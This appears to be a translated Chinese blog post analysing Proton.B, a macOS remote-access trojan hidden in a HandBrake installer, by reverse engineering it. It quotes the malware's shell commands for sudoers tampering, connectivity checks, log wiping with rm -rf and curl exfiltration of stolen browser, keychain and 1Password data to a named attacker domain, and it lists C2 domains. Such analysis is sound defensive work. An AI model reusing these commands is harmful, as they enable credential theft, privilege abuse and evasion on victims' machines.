近期,黑客又開發(fā)出了一種Proton遠程訪問工具(RAT)的新型變種。Proton是一個針對macOS系統(tǒng)的惡意軟件,它可以竊取密碼、記錄鍵盤按鍵數(shù)據(jù)和提取文件,攻擊者甚至還可以利用它來遠程登錄目標主機。
寫在前面的話
為了研究這個惡意軟件變種,我下載了一個植入了Proton的HandBrake樣本。這個樣本感染的是Proton.B,也就是Proton的變種版本。我對該惡意軟件的運行機制進行了分析,并使用逆向工程技術(shù)對其代碼進行了研究。我通過研究發(fā)現(xiàn),Proton的開發(fā)者使用了多種技術(shù)來干擾安全研究人員的分析,例如對字符串進行加密,以及在多個分散文件中存儲惡意腳本代碼等等。
注:HandBrake是目前一款非常流行的視頻編碼應(yīng)用。安全專家Patrick在他所發(fā)表的文章中詳細描述了攻擊者如何將Proton嵌入了HandBrake之中,因此本文不再對其進行贅述。
Proton的工作機制
我們首先需要處理的惡意軟件名為activity_agent。在反匯編工具中打開這個文件之后,你會發(fā)現(xiàn)它采用的編程語言為Objective-C,這也是macOS平臺“原生”的編程語言,而很多其他的惡意軟件使用的是C++或者是其他的一些跨平臺方案(例如QT)。
接下來,我使用IDA Pro對文件的二進制源碼進行了分析。在這個過程中,我發(fā)現(xiàn)了很多有意思的東西,例如SSH隧道技術(shù)等等,但是我在測試這個惡意軟件樣本的過程中卻并沒有看到SSH隧道技術(shù)的使用。
當文件被執(zhí)行之后,它會解密一個名為“.hash”的文件,這個文件位于bundle下的Resources目錄中。
這個文件中包含有大量字符串子集,而activity_monitor源碼將會加載這些字符串數(shù)據(jù),這也是很多惡意軟件開發(fā)者為了躲避安全研究人員和反病毒產(chǎn)品的檢測而經(jīng)常會用到的一種簡單的字符串隱藏技術(shù)。
解密完成之后,文件“.hash”中包含有下列數(shù)據(jù):
我們可以看到文件中使用到了大量的“%@”,這是Objective-C特有的語句標識,表示的是NSSTRING。注:Objective-C用“%@”來格式化字符串。
當這個文件被執(zhí)行之后,會彈出一個看似合法的對話框,并提示用戶輸入密碼才可以安裝HandBrake的應(yīng)用組件,但對話框中的提示文本很明顯就是文件“.hash”中的內(nèi)容。
Mac用戶在每一個對話框中輸入密碼之前,一定要三思而后行。因為通過對話框的形式來要求用戶輸入密碼是一種非常常見的社會工程學(xué)技術(shù),攻擊者可以利用這種方法來欺騙用戶交出自己的密碼。大家也都知道,很多惡意軟件攻擊都會使用這種方法。由于絕大多數(shù)環(huán)境下目標用戶都在sudoers列表之中,因此攻擊者只要拿到了用戶的密碼,就可以將自己的權(quán)限提升到root。
當用戶輸入了自己的密碼之后,該惡意軟件會立刻通過下列命令檢測密碼的有效性:
‘/bin/sh’, ‘-c’,“echo ‘qwer1234’ | sudo -S echo success;”
驗證成功之后的下一步就是通過下列命令禁用/etc/sudoers/中的“tty_tickets”功能:
‘/bin/sh’,‘-c’, ‘echo \’printf “\\033[8;1;1t”; echo “qwer1234” | sudo -S sh -c “echo\’Defaults !tty_tickets\’ >> /etc/sudoers”; killall Terminal; sleep 1;\’
tty_tickets是從macOS Sierra開始默認開啟的一項功能,每當用戶在一個單獨的終端頁面執(zhí)行一個“sudo”命令時,它都會要求用戶輸入自己的密碼。如果禁用了這項功能,那么用戶只需要輸入一次密碼,就可以在多個新的終端窗口(tty)中執(zhí)行“sudo”命令了。我認為,tty_tickets的禁用將會方便惡意軟件的開發(fā)者執(zhí)行腳本任務(wù),因為只需要輸入一次密碼就可以在不同的終端窗口中執(zhí)行sudo命令了。
當我在IDA Pro中查看activity_agent的字符串部分時,我迅速發(fā)現(xiàn)了一個公共密鑰。
這個密鑰會在下面這行命令中使用到:
‘/bin/sh’,‘-c’, “echo ‘—–BEGIN PUBLICKEY—–\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwUP19DdW2NlkkdovqqwF\n+r3sBaa
mka42zVMGa+COUCIysrVhVJIv4nmc57TLxgG8dsg+G0o0NQ75n898b04l\nYGve3gXGWJ
8Y5OTJ16+RA4OtKAiO8v7qEGnQ/QpSzrLZPU3Yd60bAltYSvCCiOdB\nOKhOAiag0H39F2k
5ea4zxt6TNDksW/o3+HcjzA4yy+C1tp2Cr4X37O5XMVZPWpMk\nsIXPazh91tr0TJ2VFyx
4btnDPajeOzhcKUA05Wrw+hagAZnFU9Bajx3KvdTlxsVx\nLmRc5r3IqDAsXTHH1jpmWMDiC9IGLDFP
rN6NffAwjgSmsKhi1SC8yFHh0oPCswRh\nrQIDAQAB\n—–ENDPUBLIC KEY—–‘ > /tmp/public.pem; openssl rsautl -verify -in/Users/test/Downloads/Proton/Proton.B/activity_agent.app/Contents/Resources/.tmpdata-pubin -inkey/tmp/public.pem; openssl rsautl -verify -in/Users/test/Downloads/Proton/Proton.B/activity_agent.app/Contents/Resources/.tmpdata-pubin –inkey
密鑰存儲在/tmp/public.pem文件之中,當這個密鑰存儲完畢之后,惡意軟件會解密一個名叫“.tmpdata”的文件,這個文件同樣在Resources目錄中。注:在macOS和Linux這種使用了POSI文件系統(tǒng)的平臺中,文件名前面有”.”表示這是一個隱藏文件。
解密后的“.tmpdata”文件中包含有惡意軟件的“許可證”(JSON格式),許可證數(shù)據(jù)為它的“有效期”以及各種校驗碼。
{“expiration_date”:”2017-05-1023:59:59 +0000″,”grace_period”:”25″,”bundle_name”:”chameleo”,”os_version”:”10.x”,”checksum”:”
128814f2b057aef1dd3e00f3749aed2a81e5ed03737311f2b1faab4ab2e6e2fe”}
接下來,惡意軟件會進行一次測試來確定已經(jīng)成功接入了互聯(lián)網(wǎng)。(與Google的DNS服務(wù)器-8.8.8.8建立一條TCP鏈接,時長20秒)
‘/bin/sh’,‘-c’, ‘nc -G 20 -z 8.8.8.8 53 >/dev/null 2>&1 && echo success’.
惡意軟件還會嘗試與下面列表中的其他域名進行連接:
handbrakestore.com
handbrake.cc
luwenxdsnhgfxckcjgxvtugj.com
6gmvshjdfpfbeqktpsde5xav.com
kjfnbfhu7ndudgzhxpwnnqkc.com
yaxw8dsbttpwrwlq3h6uc9eq.com
qrtfvfysk4bdcwwwe9pxmqe9.com
fyamakgtrrjt9vrwhmc76v38.com
kcdjzquvhsua6hlfbmjzkzsb.com
Ypu4vwlenkpt29f95etrqllq.com
隨后惡意軟件會檢測當前的時間和日期,這里非常有意思,它好像并不信任目標設(shè)備上的設(shè)置,它會與外部服務(wù)器(Google主機)單獨進行一次時間同步,很可能是因為攻擊者想要防止研究人員對本地設(shè)備時鐘動手腳。惡意軟件通過創(chuàng)建一個新的環(huán)境變量$hcresult來獲取時間和日期,這個變量可以存儲Google返回的內(nèi)容。執(zhí)行命令如下:
hcresult=`curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1
VucMVgVvhul5XqS9HkAyJY/exec`
接下來,惡意軟件還會檢測下列路徑中的文件是否存在,如果存在,則說明Proton.B的安裝已經(jīng)完成。
~/Library/VideoFrameworks/.ptrun
如果許可證仍然有效,那么Proton.B將會創(chuàng)建一個新的目錄:~/Library/Renderfiles,并將它的bundle文件拷貝到這個目錄中,然后刪除初始執(zhí)行地址中的所有bundle。
接下來,它還會創(chuàng)建另一個目錄:~/Library/VideoFrameworks。這個目錄將會存儲所有竊取來的數(shù)據(jù),隨后這些信息將會被發(fā)送給攻擊者。
根據(jù)我的研究發(fā)現(xiàn),它會竊取以下憑證:
1. Google Chrome資料和所有保存的密碼,包括cookie、保存的表單數(shù)據(jù)和密碼;
2. Safari資料和所有保存的密碼,包括cookie、保存的表單數(shù)據(jù)和密碼;
3. Firefox資料和所有保存的密碼,包括cookie、保存的表單數(shù)據(jù)和密碼;
4. Opera資料和所有保存的密碼,包括cookie、保存的表單數(shù)據(jù)和密碼;
5. 各種鑰匙串數(shù)據(jù);
6. 1Password數(shù)據(jù)庫
每一個類別的密碼將會保存在相應(yīng)的zip文件中:
Chrome數(shù)據(jù)保存在CR_dif.zip中;
Firefoxs數(shù)據(jù)保存在FF.zip中;
Opera數(shù)據(jù)保存在OP.zip中;
下列目錄中的鑰匙串數(shù)據(jù)保存在KC.zip中:
/Library/Keychains
~/Library/keychain
下列目錄中的Gnupg和iPassword數(shù)據(jù)保存在GNU_PW.zip中:
~/.gnupg
~/Library;/Application support/1Password 4
~/Library;/Application support/1Password 3.9
而所有的這些文件又會全部壓縮到一個名叫Proton.zip的文件中,這個文件保存在~/Library/VideoFrameworks目錄,隨后會被發(fā)送給攻擊者。
當所有的憑證數(shù)據(jù)壓縮完成之后,惡意軟件會使用“curl”將壓縮包發(fā)送給攻擊者-url: http://api.handbrake.biz/api/init:
當所有的壓縮包創(chuàng)建完成之后,惡意軟件還會執(zhí)行多次“killall”命令并關(guān)閉下列應(yīng)用進程:
Console
Terminal
Wireshark
這一步會大大增加研究人員對這款惡意軟件的分析難度,一個簡單的應(yīng)對方案是使用tee命令將日志輸出到其他文件,使用iTerm來代替Terminal(終端),然后使用tcpdump或Tshark來代替Wireshark。¯\_(ツ)_/¯
完成了上述的所有操作步驟之后,惡意軟件會將其本身的bundle拷貝到~/Library/RenderFiles/activity_agent.app中,然后通過添加下列LaunchAgent來實現(xiàn)在目標設(shè)備中的持久化感染:~/Library/LaunchAgents/fr.handbrake.actibity_agent.plist。
當然了,沒有清除日志記錄的惡意軟件不是一款好的惡意軟件。Proton.B還會通過下列命令來清除系統(tǒng)的日志數(shù)據(jù):
sudo -S rm -rf /var/log/* /Library/Logs/*
緩解方案
感染了Proton怎么辦?如果你感覺你的憑證已經(jīng)被攻擊者竊取了,請盡快修改你所有的賬戶密碼,包括所有的在線服務(wù)賬號。
總結(jié)
目前,macOS平臺上的絕大多數(shù)惡意軟件進行的都是一些簡單的惡意廣告活動或攻擊活動,而這也是我們第一次能夠拿到一個真實的惡意軟件樣本并對其內(nèi)部運行機制進行詳細的分析。不過遺憾的是,在整個研究過程中我們沒能到任何交互式命令的執(zhí)行,而且也沒有看到攻擊者與我的研究機器初始化新的連接。
| 
